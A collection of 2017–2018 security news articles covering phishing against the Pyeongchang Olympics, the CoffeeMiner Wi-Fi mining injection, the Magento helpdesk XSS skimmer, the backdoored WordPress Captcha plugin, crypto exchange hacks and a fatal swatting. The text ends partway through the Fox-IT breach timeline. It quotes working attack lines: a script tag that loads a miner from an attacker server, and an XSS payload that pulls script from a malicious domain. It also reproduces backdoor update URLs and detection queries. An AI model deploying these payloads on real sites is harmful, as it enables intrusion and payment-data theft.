Hackers have already begun targeting the Pyeongchang Olympic Games with malware-infected emails which may be aimed at stealing passwords or financial information, researchers said Saturday.

The security firm McAfee said in a report that several organizations associated with the Olympics had received the malicious email with the primary target being groups affiliated with ice hockey.

"The majority of these organizations (targeted) had some association with the Olympics, either in providing infrastructure or in a supporting role," the McAfee report said. "The attackers appear to be casting a wide net with this campaign."

In the attacks, which began as early as December 22, emails were "spoofed" to make them appear to come from South Korea's National Counter-Terrorism Center, which was in the process of conducting antiterror drills in the region in preparation for the Games.

McAfee said the emails came in fact from an address in Singapore, and instructed the readers to open a text document in Korean.

The document was titled "Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics," according to the report.

The malware in some cases was hidden in text, and later in an image -- a technique known as steganography, according to McAfee.

"Based on our analysis, this implant establishes an encrypted channel to the attacker's server, likely giving the attacker the ability to execute commands on the victim's machine and to install additional malware," McAfee said.

McAfee said it expects more attacks of this nature, echoing warnings last year from University of California researchers of increasing targeting of sporting events.

"With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes," the McAfee report said.

"In similar past cases, the victims were targeted for their passwords and financial information."


CoffeeMiner – Hacking WiFi networks to mine cryptocurrencies
7.1.2018 securityaffairs Hacking

A developer published a proof-of-concept project dubbed CoffeeMiner for hacking public Wi-Fi networks and mine cryptocurrencies.
The spike in the values of Bitcoin is attracting the interest of crooks that are adopting any method to steal crypto wallets or computational resources from the victims.

A developer named Arnau has published a proof-of-concept project dubbed CoffeeMiner for hacking public Wi-Fi networks to inject crypto-mining code into connected browsing sessions, an ingenious method to rapidly monetize illegal efforts.

The experts explained that his project was inspired by the Starbucks case where hackers hijacked laptops connected to the WiFi network to use the devices computing power to mine cryptocurrency.

Arnau explained how to power a MITM (Man(Person)-In-The-Middle) attack to inject some javascript in the html pages accessed by the connected users, in this way all the devices connected to a WiFi network are forced to be mine a cryptocurrency.

The CoffeeMiner works by spoofing Address Resolution Protocol (ARP) messages on a local area network in order to intercept unencrypted traffic from other devices on the network.

The MiTM attack is conducted by using software called mitmproxy that allows to inject the following line of HTML code into unencrypted traffic related to the content requested by other users on the networks:

<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>
“mitmproxy is a software tool that allows us to analyze the traffic that goes through a host, and allows to edit that traffic. In our case, we will use it to inject the javascript into the html pages.” wrote Arnau.

“To make the process more more clean, we will only inject one line of code into the html pages. And will be that line of html code that will call to the javascript cryptocurrency miner.”

When the user’s browser loads the pages with the injected code it runs the JavaScript and abuses CPU time to generate Monero using CoinHive‘s crypto-mining software.

Arnau set up VirtualBox machine to demonstrate the attack, and also published a couple of PoC video for the attack in a virtualized environment and in a real world WiFi network:

 

The CoffeeMiner version published by the researcher doesn’t work with HTTPS, but the limitation could be bypassed by addition sslstrip.

“Another further feature, could be adding sslstrip, to make sure the injection also in the websites that the user can request over HTTPS.” concluded the researcher.

Arnau published the code of the CoffeeMiner project on GitHub.


Microsoft Word subDoc Feature Allows Password Theft
5.1.2018 securityweek Hacking
A feature in Microsoft Word that allows for the loading of sub-documents from a master document can be abused by attackers to steal a user’s credentials, according to Rhino Security Labs.

Dubbed subDoc, the feature was designed to load a document into the body of another document, so as to include information from one document into the other, while also allowing for the information to be edited and viewed on its own.

According to Rhino Security, the feature can also be used to load remote (Internet-hosted) subDoc files into the host document, thus allowing for malicious abuse in certain situations.

The feature, Rhino's researchers explain, is similar to attachedTemplate, another Office feature that can be abused by attackers for malicious purposes. The method allows the creation of malicious documents that would open an authentication prompt in the Windows style once the intended victim opens them, thus enabling the attacker to harvest credentials remotely.

“We determined, after testing in our sandbox environment, that abusing the subDoc method would allow us to do the same thing as the attachedTemplate method,” Rhino Security’s Hector Monsegur explains.

The researcher also points out that some organizations are not filtering egress SMB requests, meaning that they would leak the NTLMv2 (session protocol) hash in the initial SMB request.

To exploit the feature, Rhino Security created a document opening a subDoc external resource using a Universal Naming Convention (UNC) path (a means of connecting to servers and workstations without specifying a drive) that points to a destination they would control.

This allowed them to load the Responder to listen for incoming SMB requests and collect the NTLMv2 hashes. Available on GitHub, Responder is a LLMNR, NBT-NS and MDNS poisoner designed to answer to File Server Service request, which is for SMB, and remain stealthy on the network.

“The attack process for this would be to send a tainted document out to several targets while running Responder server on associated C&C server. After targets open the document, we intercept the respective hashes, crack them using hashcat and use our newly found credentials for lateral movement across the target network,” Monsegur explains.

When the document is opened, subDoc automatically attempts to load and provides the user with a link instead of the would-be document. However, user interaction with the link isn’t required for the payload to execute, the researcher says. The link can also be hidden from the user, so that they wouldn’t detect the malicious intent.

The attack, the researcher points out, isn’t detected by popular anti-virus companies, mainly because the subDoc feature hasn’t been recognized publicly as an attack vector for malicious actions.

The security researcher also published an open source tool designed to generate a Word subDoc for a user-defined URL and also to integrate it into a user-specified ‘parent’ Word doc. Dubbed Subdoc Injector, the tool is available on GitHub.

“Office has a myriad of loosely-documented features that have yet to be explored. As more research goes into these functions, more vulnerabilities and abusable functions will likely be discovered, making the situation difficult for defenders to protect their systems,” Monsegur notes.


Anonymous Italia hacked speed camera database and took over the police systems in Correggio
4.1.2017 securityaffairs Hacking

Anonymous Italy hacked and deleted the entire speed camera database and took over the police email and database system in Correggio.
Last week, Anonymous hacked a Speed Camera Database in Italy, the hacktivists took control of a local police computer system in Correggio, Italy and erased the entire archive containing speed camera tickets. According to Gazzetta di Reggio, the hackers also released internal emails and documents.

Anonymous%20Italy%20speed%20camera%20database

The hackers provided screenshots of the attack to several Italian newspapers, it seems they have wiped an entire archive containing 40 gigabytes worth of infringement photographs.

Anonymous%20Italy%20speed%20camera%20database

The Anonymous hackers sent a message using the e-mail account of the Correggio municipal police.

“Ho Ho Ho, Merry Christmas,” read the message from Anonymous.

The message announced the hack of the Concilia database and of the system developed by the company Verbatel, it also included the links and passwords to download them.

The message includes screenshots of the hack, one of them show a Windows command line likely related to the hacked computer of the Correggio municipal police.

Two images show claims from two motorists complaining that they received tickets from Correggio speed cameras, even though they had never passed through the area.

Emails between police administrators and local politicians discussed how the speed camera profits were to be distributed.

One of the screenshots is related to an email sent by an employee at Correggio data center who explains that he has restored the Concilia DB using a backup dated Dec. 5 due to a serious problem.

The police are still investigating the case.


Hackers can remotely control thousands of Sonos and Bose speakers
1.1.2018 securityaffairs Hacking

Security experts at Trend Micro have demonstrated that certain models of Sonos and Bose speakers are affected by vulnerabilities that could allow attackers to hijack them.
Hackers can trigger the flaws to access the speakers and use them to play spooky sounds or to issue Alexa commands.

Only specific models of the two companies are actually affected by the issues, including the Sonos One and the Bose SoundTouch.

Attackers scan the Internet for vulnerable devices, once discovered flawed speakers they can use the API to instruct them into playing any audio file hosted at a specific URL.

“The impacted models allow any device on the same network to access the APIs they use to interface with apps like Spotify or Pandora without any sort of authentication.” reads the post published by Wired. “Tapping into that API, the researchers could simply ask the speakers to play an audio file hosted at any URL they chose, and the speakers would obey.”

speakers%20SoundofTA_Attack-Scenario-01

The experts at Trend Micro have found between 2,500 to 5,000 Sonos devices and 400 to 500 Bose devices open to audio hacking.

The attacks are more scaring in scenarios in which those voice assistant devices control smart home features from door locks, conditioners, and lighting.

“Whereas previous studies focused on seizing control of speakers like the Amazon Echo and Google Home, the results of our case study led to unique findings. These include security gaps that resulted from a simple open port that gave anyone on the internet access to the device and user information.” reads the post published by Trend Micro. “The first glaring finding was access to email addresses that are linked to music streaming services synced with the device. Another was access to a list of devices as well as shared folders that were on the same network as the test device. “

In testing devices running an older version of Sonos software, the researchers demonstrated that they leak detailed information, like the IP addresses and device IDs of gadgets that had connected to the speakers.

The attack that was theorized by Trend Micro were already reported in the wild, one Sonos customer earlier this year reported that her speaker started playing strange sounds.

Trend Micro shared its findings with Sonos, which quickly fixed the issues, including a denial-of-service (DoS) bug, while Bose still hasnìt replied.

The full report including the attack scenarios is available at the following link:

The Sound of a Targeted Attack.


A 28-year-old Kansas man was shot and killed by police in a swatting attack
30.12.2017 securityaffairs Hacking

Andrew Finch, a 28-year-old man from Wichita, Kansas, was killed last week in a swatting attack by police who were responding to a call reporting a hostage situation at the man’s house.
All begun on the evening of December 28, two gamers bet they could complete the Call of Duty game by ‘swatting’ each other, but one of them gave the wrong address to a nearby known swatter.

“The two CoD players reportedly got into an argument over a small money loss on UMG’s wager platform online (view match) and threatened to swat each other, with one of the players sending the other incorrect details of an address nearby to a known swatter, who was reportedly responsible for the CWL Dallas bomb hoax evacuations.” reported the website Dexerto.

29 Dec

Christopher Duarte

@Parasite
Unbelievable, two kids in the community got in a verbal dispute and thought it would be funny to swat each other which resulted in an innocent man being killed by police officers responding to the swat calling. Disgusted.


Christopher Duarte

@Parasite
pic.twitter.com/ZCTqzucWwnhttp://www.kansas.com/news/local/crime/article192081124.html …

5:29 AM - Dec 29, 2017
View image on TwitterView image on Twitter
47 47 Replies 191 191 Retweets 347 347 likes
Twitter Ads info and privacy
Yes, you heard right, the absurd death was the result of a “swatting” attack gone wrong.

According to the popular expert Brian Krebs, the dispute originated on Twitter, one of the parties allegedly using the Twitter handle “SWauTistic” threatened to swat another user who handles the account “7aLeNT“. @7aLeNT dared someone to swat him, but then tweeted an address that was not his own.

“Swautistic responded by falsely reporting to the Kansas police a domestic dispute at the address 7aLenT posted, telling the authorities that one person had already been murdered there and that several family members were being held hostage.” wrote Krebs.

“Not long after that, Swautistic was back on Twitter saying he could see on television that the police had fallen for his swatting attack. When it became apparent that a man had been killed as a result of the swatting, Swautistic tweeted that he didn’t get anyone killed because he didn’t pull the trigger (see image above).

Swautistic soon changed his Twitter handle to @GoredTutor36, but KrebsOnSecurity managed to obtain several weeks’ worth of tweets from Swautistic before his account was renamed. Those tweets indicate that Swautistic is a serial swatter — meaning he has claimed responsibility for a number of other recent false reports to the police.”

Kansas%20Swatting

“I heard my son scream, I got up, and then I heard a shot,” said Lisa Finch, the mother of the shooting victim, in a video interview with the Wichita Eagle.

Police then handcuffed Lisa Finch and took her outside, along with “my roommate and my granddaughter, who witnessed the shooting and had to step over her dying uncle’s body.”

Andrew was unarmed and the police did not find any weapon in the house.

A typical “Swatting” scenario sees someone calls police from the target’s home and describes a fake emergency situation urging the intervention of the law enforcement. This is what has happened at the Finch’s house.

“We were told that someone had an argument with their mother, and dad was accidentally shot and that now that person was holding brother, sister, and mother hostage,” a police official told reporters.

According to the official, Andrew Finch “came to the front door” and “one of our officers discharged his weapon,” killing the man, but he declined to explain why the agent opened the fire.

To be clear, Andrew Finch was not a Call of Duty player and he was no linked with the two gamers.

The police are investigating the case to track the person who called them first reporting the fake emergency.

The recording of the call to 911 operators that prompted this tragedy can be heard at this link.

Swatting is a serious problem, a member of Congress has proposed legislation to combat this illegal practice.

Back in 2013, the popular expert Brian Krebs was the victim of a swatting attack, fortunately with a happy ending.


Hackers are attempting to breach Magento stores through the Mirasvit Helpdesk extension
30.12.2017 securityaffairs Hacking

The cybersecurity expert Willem de Groot reported cyber attacks against Magento websites running the popular helpdesk extension ‘Mirasvit Helpdesk.’
de Groot observed attackers sending a message like this to Magento merchants:

Hey, I strongly recommend you to make a redesign! Please contact me if you need a good designer! – knockers@yahoo.com

The message contains a specially crafted sender that triggers an XSS attack.

“Upon closer examination, the message contains a specially crafted sender that contains an XSS attack: an attempt to take control of the backend of a Magento store (archived copy here):”

<script src="https://helpdeskjs.com/jquery.js"></script>@gmail.com
“This exploits a flaw in the popular Mirasvit Helpdesk extension. When a helpdesk agent opens the ticket, it will run the code in the background, in the browser of the agent.” wrote de Groot.

The attack exploits one of the flaws discovered in September 2017 by the researchers at the security firm WebShield that affected all versions of the Mirasvit Helpdesk extension until 1.5.2. The company addressed the issued with the release of the version 1.5.3.

When a helpdesk agent opens the ticket, it will run the code for the XSS attack in the background, then a malicious code is added to the footer of the Magento template. In this way, the attacker is able to get its code executed on any page accessed by visitors. The malware used in the attacks spotted by the expert was designed to intercept payments data and send it offshore as the customer types it into the payment form.

“Ultimately, the malware intercepts payments data and send it offshore as the customer types it into the payment form.” de Groot added.

“This attack is particularly sophisticated, as it is able to bypass many security measures that a merchant might have taken. For example, IP restriction on the backend, strong passwords, 2-Factor-Authentication and using a VPN tunnel will not block this attack.”

Mirasvit%20Helpdesk

de Groot suggested to run the following query on the database to find XSS attacks:

SELECT *
FROM `m_helpdesk_message`
WHERE `customer_email` LIKE '%script%'
OR `customer_name` LIKE '%<script%'
OR `body` LIKE '%<script%' \G
and search access logs for modifications of templates through the backend:

$ grep system_config/save/section/design access.log

The expert also published a copy of the malware on GitHub.

Mirasvit published a blog post warning its customers and urging them to update their installs.


For the second year in a row, “123456” was the top password found in data dumps in 2017
27.12.2017 securityaffairs  Hacking

For the second year in a row, “123456” was the top password found in data dumps in 2017 despite the numerous warning of using strong passwords.
For the second year in a row, “123456” was the top password among the millions of cleartext passwords exposed online due to the numerous data breaches suffered by organizations and private firms.

The list was published by researchers at SplashData who analyzed more than five million user records containing passwords that were leaked online in 2017.

“Use of any of the passwords on this list would put users at grave risk for identity theft,” said a SplashData spokesperson in a press release.

The list of Top 100 Worst Passwords of 2017 is embarrassing, it includes a huge number of sports terms (football, baseball, soccer, hockey, Lakers, jordan23, golfer, Rangers, Yankees) and car brands (Corvette, Ferrari, Harley, Mercedes).

Users continue to use common names as their passwords, names like of Robert (#31), Matthew (#32), Jordan (#33), Daniel (#35) and many others continue to be widely used.

top%20password

Top passwords are the basic components of lists used by hackers in brute force attacks based on dictionaries. Attackers will use the Top password list also to create common variations on these words using simple algorithms, for example by adding a digit or any other character combinations at the start or end of words.

Despite the numerous report published by the experts, users continue to adopt weak passwords and tend to reuse them to access several web services.

Let me close the post with the list of the Top 10 passwords extracted from the SplashData report.

1 – 123456 (rank unchanged since 2016 list)
2 – password (unchanged)
3 – 12345678 (up 1)
4 – qwerty (Up 2)
5 – 12345 (Down 2)
6 – 123456789 (New)
7 – letmein (New)
8 – 1234567 (Unchanged)
9 – football (Down 4)
10 – iloveyou (New)


The popular cryptocurrency exchange EtherDelta suffered a DNS attack
27.12.2017 securityaffairs  Hacking

The popular cryptocurrency exchange EtherDelta was hacked, attackers conducted a DNS attack that allowed to steal at least 308 ETH ($266,789) as well as a large number of tokens.
The spike in cryptocurrency values is attracting cybercriminals, the last victim is the popular cryptocurrency exchange EtherDelta that announced a potential attack against its DNS server.
As result of the attack, the exchange suspended its service, below the tweet sent by the company that confirms that its server was hacked by attackers.


EtherDelta
@etherdelta
Dear users, we have reason to believe that there had been malicious attacks that temporarily gained access to @etherdelta http://EtherDelta.com DNS server. We are investigating this issue right now - in the meantime please DONOT use the current site.

9:34 PM - Dec 20, 2017
81 81 Replies 536 536 Retweets 359 359 likes
Twitter Ads info and privacy
The attackers spoofed EtherDelta’s domain to trick users into sending money.

“At least 308 ETH ($266,789) were stolen, as well as a large number of tokens potentially worth hundreds of thousands of dollars.” reported Mashable.

EtherDelta posted another tweet to warn its users and explain that the impostor’s app had no chat button on the navigation bar, nor did it have an official Twitter feed on the bottom right. EtherDelta advised all users not to use the site.


EtherDelta
@etherdelta
⚠️ 2/2 *BE AWARE* The imposer's app has no CHAT button on the navigation bar nor the offical Twitter Feed on the bottom right. It is also populated with a fake order book.

9:48 PM - Dec 20, 2017
296 296 Replies 517 517 Retweets 410 410 likes
Twitter Ads info and privacy
On Dec. 22, the service was fully restored. The company clarified that users using the MetaMask or hardware wallet on EtherDelta were not affected by the attack, also users that had never imported their private key on the imposer’s phishing site are safe.

EtherDelta

Recently another cryptocurrency exchange, the South Korean Youbit has gone bankrupt after suffering a major cyber attack for the second time this year.

Earlies December, the cryptocurrency mining market NiceHash confirmed it has fallen victim to a hacking attack that resulted in the loss of $60m worth of Bitcoin.

The EtherDelta hack is emblematic, even if EtherDelta is supposed to be decentralized the attack against its website caused serious problems to the company operations.


ATMs operated by a Russian Bank could be hacked by pressing five times the ‘Shift’ key
27.12.2017 securityaffairs Hacking

ATMs operated by the Sberbank bank running Windows XP are affected by easily exploitable security vulnerabilities, they could be hacked by pressing five times the ‘Shift’ key.
We have warned several times of risks for ATM running outdated Windows XP operating system. These systems could be easily hacked as recently discovered by an employee of the Russian blogging platform Habrahabr who reported that the ATMs operated by the Sberbank bank running Windows XP are affected by easily exploitable security vulnerabilities.

The user discovered that a full-screen lock that prevents access to various components of an ATM operating system could be bypassed by pressing five times special keys like SHIFT, CTRL, ALT, and WINDOWS.

By pressing the SHIFT key five times it is possible to access the Windows settings and displaying the taskbar and Start menu of the operating system, with this trick users can have access to Windows XP by using the touchscreen.

“Well, I, standing at the terminal of the Savings Bank with a full-sized keyboard and waiting for the operator to answer the phone, decided to press this Shift from boredom, naively believing that without functional keys this would lead to nothing. No matter how it is! Five times quick pressing of this key gave me that very little window, besides revealing the task panel with all the bank software.” wrote the user.

“Stopping the work of the batch file (see the taskbar on the video below), and then all the banking software, you can break the terminal.”

This vulnerability allows hackers to modify ATM boot scripts and install malicious code on the machine.

The users tried to report the issue to the Sberbank contact center, but unfortunately, the operator was not able to help the man and suggested him to contact the support service using the phone number written on the terminal itself.

According to the German website WinFuture, Sberbank had been informed of the security flaw in its ATM almost two weeks ago. The bank confirmed to have immediately fixed the security issue, but the user who discovered the flaw claimed that the issue is still present on the terminal he visited.

“In tech support, a friendly girl after I said that I want to report a vulnerability, immediately switched me to some other specialist. He first asked how to contact me and the terminal number, then on the nature of the problem, then I listened to music for a long time, and, after all, the guy said that the problem is fixed. ” continues the user.

“All this happened on the sixth of December. Two weeks later I decided to check that there is a terminal. Still, after all, they said that they “fixed” the problem, probably they should have already eliminated it, but no – it’s still there, the window still pops up.”

Security experts urge financial institutions to update the latest version of Windows for their ATMs.


Hackers Targeting Servers Running Database Services for Mining Cryptocurrency
21.12.2017 thehackernews Hacking

Security researchers have discovered multiple attack campaigns conducted by an established Chinese criminal group that operates worldwide, targeting database servers for mining cryptocurrencies, exfiltrating sensitive data and building a DDoS botnet.
The researchers from security firm GuardiCore Labs have analyzed thousands of attacks launched in recent months and identified at least three attack variants—Hex, Hanako, and Taylor—targeting different MS SQL and MySQL servers for both Windows and Linux.
The goals of all the three variants are different—Hex installs cryptocurrency miners and remote access trojans (RATs) on infected machines, Taylor installs a keylogger and a backdoor, and Hanako uses infected devices to build a DDoS botnet.
So far, researchers have recorded hundreds of Hex and Hanako attacks and tens of thousands of Taylor attacks each month and found that most compromised machines are based in China, and some in Thailand, the United States, Japan and others.
To gain unauthorized access to the targeted database servers, the attackers use brute force attacks and then run a series of predefined SQL commands to gain persistent access and evade audit logs.
What's interesting? To launch the attacks against database servers and serve malicious files, attackers use a network of already compromised systems, making their attack infrastructure modular and preventing takedown of their malicious activities.

For achieving persistent access to the victim's database, all three variants (Hex, Hanko, and Taylor) create backdoor users in the database and open the Remote Desktop port, allowing attackers to remotely download and install their next stage attack—a cryptocurrency miner, Remote Access Trojan (RAT) or a DDoS bot.
"Later in the attack, the attacker stops or disables a variety of anti-virus and monitoring applications by running shell commands," the researchers wrote in their blog post published Tuesday.
"The anti-virus targeted is a mixture of well-known products such as Avira and Panda Security and niche software such as Quick Heal and BullGuard."
Finally, to cover their tracks, the attackers deletes any unnecessary Windows registry, file, and folder entry using pre-defined batch files and Visual Basic scripts.
Administrators should check for the existence of the following usernames in their database or systems in order to identify if they have been compromised by the Chinese criminal hackers.
hanako
kisadminnew1
401hk$
Guest
Huazhongdiguo110
To prevent compromise of your systems, researchers advised administrators to always follow the databases hardening guides (provided by both MySQL and Microsoft), rather than just having a strong password for your databases.
"While defending against this type of attacks may sound easy or trivial—'patch your servers and use strong passwords'—we know that 'in real life' things are much more complicated. The best way to minimize your exposure to campaigns targeting databases is to control the machines that have access to the database," the researchers advised.
"Routinely review the list of machines that have access to your databases, keep this list to a minimum and pay special attention to machines that are accessible directly from the internet. Every connection attempt from an IP or domain that does not belong to this list should be blocked and investigated."


Backdoored Captcha Plugin Hits 300,000 WordPress Sites
21.12.2017 securityweek Hacking
Yet another plugin was removed from the WordPress repository after a backdoor was added to it following a recent update.

Called "Captcha" and featuring 300,000 active installs at the time it was removed, the plugin was found to have changed ownership several months ago. Initially developed and maintained by BestWebSoft, it was owned by an unnamed developer at the time the backdoor was added.

Through an update on December 4, code designed to trigger an automatic update process and download a ZIP file from the simplywordpress[dot]net domain was added to the plugin. The archive would extract and install itself over the copy of the Captcha plugin already running on site.

Inside the ZIP archive, a file called plugin-update.php, which was found to be the backdoor, was included, in addition to small changes to the plugin itself. The file would grant the author unauthorized administrative access to the WordPress websites using the plugin.

The backdoor was designed to create a session with user ID 1 (the default admin user WordPress creates at install), to set authentication cookies, and delete itself. Because the backdoor’s installation code was unauthenticated, anyone could trigger it, Wordfence reports.

The ZIP file also included an update to the URL using the same process that installed the backdoor, only this time to remove all traces of the malicious code.

The simplywordpress[.]net domain hosting the ZIP file is registered to a Stacy Wellington (scwellington@hotmail.co.uk), who apparently has registered a large number of other domains as well. One of the domains is unsecuredloans4u[.]co[.]uk, which is linked to Mason Soiza, an individual previously associated with similarly backdoored WordPress plugins.

“[Soiza] has a long history of buying WordPress plugins in order to place cloaked backlinks on his users’ sites. He then uses these backlinks to increase page rank in SERPs (Search Engine Results Pages) since only web crawlers such as Googlebot can read them,” Wordfence explains.

The individual buys plugins and, after a few months, adds the backdoor code to them to create cloaked backlinks to its own loan sites and boost site rankings for different search terms.

simplywordpress[.]net also includes the backdoored plugins Covert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

Looking at the website’s DNS history, Wordfence discovered a previous A-record of 195.154.179.176, which is the current A-record for unsecuredloans4u[.]co[.]uk, Mason Soiza’s domain. The same IP address is also used to host pingloans[.]co[.]uk, a site registered to Serpable Ltd, which is owned by a Charlotte Ann Wellington.

By digging deeper, Wordfence also discovered that both Wellingtons and Mason Soiza are linked to a Quint Group Limited. Stacy Wellington mentions working for Serpable, which is (or was previously) an SEO company and also “is an Introducer Appointed Representative of Quint Group Limited.”

“However, at this time, it’s unclear if either Charlotte or Stacy Wellington is the creator of the backdoor code we discovered in the Captcha plugin,” Wordfence notes.

Given the strong correlation between Stacy Wellington, simplywordpress[.]net, and heyrank[.]co[.]uk (another domain hosted on 195.154.179.176 and registered to the individual), the researchers suggest that wpdevmgr2678, the new owner of the Captcha plugin, could be Stacy Wellington.

Wordfence and the WordPress.org plugins team released a patched version of Captcha (v4.4.5) that no longer includes the backdoor. The automatic update mechanism was used to upgrade all backdoored versions (4.3.6 – 4.4.4) up to the new one and over 100,000 sites running versions the backdoored iterations were upgraded over the weekend.


Backdoor in Captcha Plugin poses serious risks to 300K WordPress sites
20.12.2017 securityaffairs Hacking

Experts discovered that the popular WordPress Captcha plugin installed on over 300,000 sites was recently updated to deliver a hidden backdoor.
Security experts at WordFence have discovered that the popular WordPress Captcha plugin installed on over 300,000 sites was recently updated to deliver a hidden backdoor. The WordPress team promptly removed the plugin from the official WordPress Plugins repository and provided sanitized versions for affected customers.

WordPress also blocked the author of the plug-in from publishing updates without the review of its development team, WordFence now includes firewall rules to block Captcha and five other plugins from the same author.

WordFence has worked with the WordPress plug-in team to patch pre-4.4.5 versions of the plug-in.

The WordPress team noticed something of strange in September, when the plug-in changed hands. Just three months later the new team distributed the backdoored version Captcha 4.3.7.

Experts found a code triggering an automatic update process that downloads a ZIP file from:

https://simplywordpress[dot]net/captcha/captcha_pro_update.php
then extracts and installs itself modifying the install of the Captcha plugin running on WordPress site.

“Whenever the WordPress repository removes a plugin with a large user base, we check to see if it was possibly due to something security-related. Wordfence alerts users when any plugin they are running is removed from WordPress repo as well. At the time of its removal, Captcha had over 300,000 active installs, so its removal significantly impacts many users.” states the analysis published by WordPress.

“A backdoor file allows an attacker, or in this case, a plugin author, to gain unauthorized administrative access to your website. This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself.”

1 < $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_pro_update.php';
2 ---
3 > $wptuts_plugin_remote_path = 'https://simplywordpress.net/captcha/captcha_free_update.php';

WordFence investigated the new ownership of the plugin, it noticed that the domain used to deliver the ZIP file containing the backdoor is simplywordpress[.]net that is registered to someone named Stacy Wellington using the email address scwellington@hotmail.co.uk.

It was easy to discover that the same email address was used to register a large number of other domains and the footer of one of them referenced Martin Soiza.

In September, around 200,000 WordPress websites using the Display Widgets Plugin were impacted after it was updated to include malicious code. Further investigation allowed the experts at WordFence to discover that the man behind plugin spam was the Briton Mason Soiza (23) who bought the plugin in late May.

WordFence discovered that also other plug-ins from the simplywordpress domain ( Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange) contain the same backdoor code.

According to the researchers, the backdoor was used to create cloaked backlinks to various payday loan businesses in order to boost their Google rankings.

“If you have not read our previous post on Mason Soiza, I’d suggest you read that first, since he has a long history of buying WordPress plugins in order to place cloaked backlinks on his users’ sites. He then uses these backlinks to increase page rank in SERPs (Search Engine Results Pages) since only web crawlers such as Googlebot can read them.” states WordPress.

“The hostmaster email address is the same for both simplywordpress.net and unsecuredloans4u.co.uk (Stacy Wellington scwellington@hotmail.co.uk).”

Let me close with simple recommendation provided by the experts, hurry up,uninstall the Captcha plugin immediately from your site.


South Korea cryptocurrency exchange Youbit shuts down after second hack in 2017
19.12.2017 securityaffairs Hacking

The South Korea Cryptocurrency Exchange Youbit has gone bankrupt.after suffering a major cyber attack for the second time this year.
The South Korea Cryptocurrency Exchange Youbit shuts down after suffering a major cyber attack for the second time this year. The company announced bankrupt on Tuesday after being hacked for the second time in the last eight months, the company declared it had lost 17 percent of its assets in the last attack.

This is the first time that a cryptocurrency exchange based in South Korean has gone bankrupt.

Eight months ago hackers stole nearly 4,000 bitcoin (5.5 billion won ($5 million) at the time of the hack) that accounted for nearly 40 percent of the Youbit exchange’s total assets.Lazarus targets Bitcoin company

Lazarus targets Bitcoin company

“We will close all trades, suspend all deposits or withdrawals and take steps for bankruptcy,” reads the statement issued by the company after the last attack.

In order to minimize the economic impact of the customers, all the clients will have their cryptocurrency assets marked down by 25 percent, in this way Youbit wants to cover the losses selling the remaining assets and using insurance.

The South Korean market for virtual currencies has become one of the most active, considering that whose trades account for some 20 percent of global Bitcoin transactions. More than one million South Koreans already invested in Bitcoin.

Analysts observed that the demand is very high, for this reason, prices for the unit are around 20 percent higher than in the US.

While global bitcoin prices continue to increase, threat actors are focusing their interests on the virtual currencies.

Recently security experts from Secureworks revealed the Lazarus APT group launched a spearphishing campaign against a London cryptocurrency company.


South Korea Cryptocurrency Exchange Shuts Down After Hacking
19.12.2017 securityweek Hacking
A South Korean exchange trading bitcoin and other virtual currencies declared itself bankrupt on Tuesday after being hacked for the second time this year, highlighting the risk over cryptocurrencies as they soar in popularity.

The Youbit exchange said it had lost 17 percent of its assets in the attack on Tuesday.

It came eight months after nearly 4,000 bitcoin -- then valued at 5.5 billion won ($5 million) and nearly 40 percent of the exchange's total assets -- were stolen in a cyber attack blamed on North Korea.

"We will close all trades, suspend all deposits or withdrawals and take steps for bankruptcy," the exchange said in a statement which did not assign blame for the latest attack.

All its customers will have their cryptocurrency assets marked down by 25 percent, it said, adding it would do its best to "minimise" their losses by using insurance and selling the remains of the firm.

The exchange -- founded in 2013 -- brokered trades of multiple virtual currencies including bitcoin and ethereum.

It is the first time that a South Korean cryptocurrency exchange has gone bankrupt.

Investing in virtual currencies has become hugely popular in the hyper-wired South, whose trades account for some 20 percent of global bitcoin transactions.

About one million South Koreans, many of them small-time investors, are estimated to own bitcoin. Demand is so high that prices for the unit are around 20 percent higher than in the US, its biggest market.

Global bitcoin prices have soared around 20-fold this year.

Concerns over a potential bubble have unnerved Seoul's financial regulators, who last week banned its financial institutions from dealing in virtual currencies.


The cybersecurity firm Fox-IT disclosed a security breach that affected its infrastructure
16.12.2017 securityaffairs Hacking

For Fox-IT disclosed a security breach that affected its infrastructure and demonstrated how to manage it in an outstanding way.
The cybersecurity firm Fox-IT, one of the top security companies currently owned by the UK giant NCC Group, disclosed a security breach that affected its infrastructure. According to the firm, on September 19 an unknown attacker carried out a Man-in-the-Middle (MitM) attack and spied on a limited number of customers.

“It’s become a widely accepted mantra that experiencing a cyber breach is a question of ‘when’ and not ‘if’. For Fox-IT ‘if’ became ‘when’ on Tuesday, September 19 2017, when we fell victim to a “Man-in-the-Middle” attack.” reads the security breach disclosure published by the company.

According to Fox-IT, the attackers hijacked the company’s domain name for 10 hours and 24 minutes and obtained an SSL certificate in Fox-IT’s name.


The hackers redirected the domain to a private VPS server under their control in order to power a MitM attack. In this position the attackers were able to receive traffic intended for the Fox-IT domain, using the SSL certificate to read the content of HTTPS connections, and then forward the traffic to the actual Fox-IT server.

According to Fox-IT, the attackers only targeted ClientPortal website by intercepting traffic for it. According to Fox-IT, hackers accessed any information sent to the Client portal, including login attempts and credentials, and files.

“the attacker was able to redirect inbound traffic to ClientPortal and emails going to the fox-it.com domain for a short period of time. At no stage did they have access to any external or internal Fox-IT system, or indeed system level access to our ClientPortal.” continues the breach notification.

Fox-IT promptly detected the domain hijacking and MitM attack after just 5 hours and disabled 2FA login process as a mitigation measure. The hackers only intercepted credentials for 9 users and a total of 12 files, none of the files were marked as “secret,” and did not contain sensitive information.

In response to the incident, Fox-IT notified affected customers and reset intercepted passwords, of course, it notified Dutch law enforcement of the incident.

Below is a detailed timeline of the cyber attack:

Sept 16 2017 First reconnaissance activities against our infrastructure that we believe are attributable to the attacker. These included regular port scans, vulnerability scans and other scanning activities.
Sept 19 2017, 00:38 The attacker changed DNS records for fox-it.com domain at a third party provider.
Sept 19 2017, 02:02 Latest moment in time that we have been able to determine that clientportal.fox-it.com still pointed to our legitimate ClientPortal server. This means that traffic destined for the ClientPortal was not being intercepted yet.
